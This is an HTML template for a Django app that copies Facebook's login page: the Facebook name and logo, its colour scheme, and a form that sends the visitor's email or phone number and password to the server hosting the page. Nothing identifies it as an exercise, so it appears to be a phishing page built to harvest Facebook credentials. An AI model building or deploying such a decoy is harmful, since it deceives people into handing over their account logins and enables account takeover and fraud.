<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook Login</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            font-family: Arial, sans-serif;
        }
        .container {
            max-width: 400px;
            margin: 0 auto;
            text-align: center;
        }
        .logo {
            margin-top: 50px;
            margin-bottom: 30px;
        }
        .logo img {
            width: 200px;
        }
        .form {
            background-color: #ffffff;
            padding: 30px;
            border-radius: 5px;
            box-shadow: 0 2px 10px rgba(71, 71, 71, 0.52);
        }
        .form input {
            width: 100%;
            margin-bottom: 15px;
            padding: 15px;
            font-size: 18px;
            box-sizing: border-box;
            border: 1px solid #eeebeb;
            border-radius: 5px;
            outline: none;
        }
        .form input:focus {
            box-shadow: 0px 0px 1px 1px rgb(22, 111, 229);
        }
        .form button {
            width: 100%;
            margin-bottom: 15px;
            color: #fff;
            font-size: 20px;
            font-weight: 600;
            border-radius: 5px;
            border: none;
            padding: 13px 0;
            cursor: pointer;
            background: #166fe5;
        }
        .form button:hover {
            background: #1877f2;
        }
        .form a {
            color: #166fe5;
            font-size: 14px;
            text-decoration: none;
            margin-top: 5px;
            margin-bottom: 20px;
            display: block;
        }
        .form a:hover {
            text-decoration: underline;
        }
        .create-btn {
            margin-top: 10px;
        }
        .create-btn a {
            color: #fff;
            font-size: 16px;
            text-decoration: none;
            padding: 15px 20px;
            border-radius: 5px;
            background: #36a420;
            font-weight: 600;
            display: inline-block;
            margin-bottom: 5px;
        }
        .create-btn a:hover {
            background: #42b72a;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="logo">
            <img src="https://i.postimg.cc/NMyj90t9/logo.png" alt="Facebook">
        </div>
        <div class="form">
            <form method="post">
                {% csrf_token %}
                <input type="text" name="email" placeholder="Email or phone number" required>
                <input type="password" name="password" placeholder="Password" required>
                <button type="submit">Log In</button>
                <a href="#">Forgotten Password</a>
            </form>
            <hr>
            <div class="create-btn">
                <a href="#" target="_blank">Create New Account</a>
            </div>
        </div>
    </div>
</body>
</html>
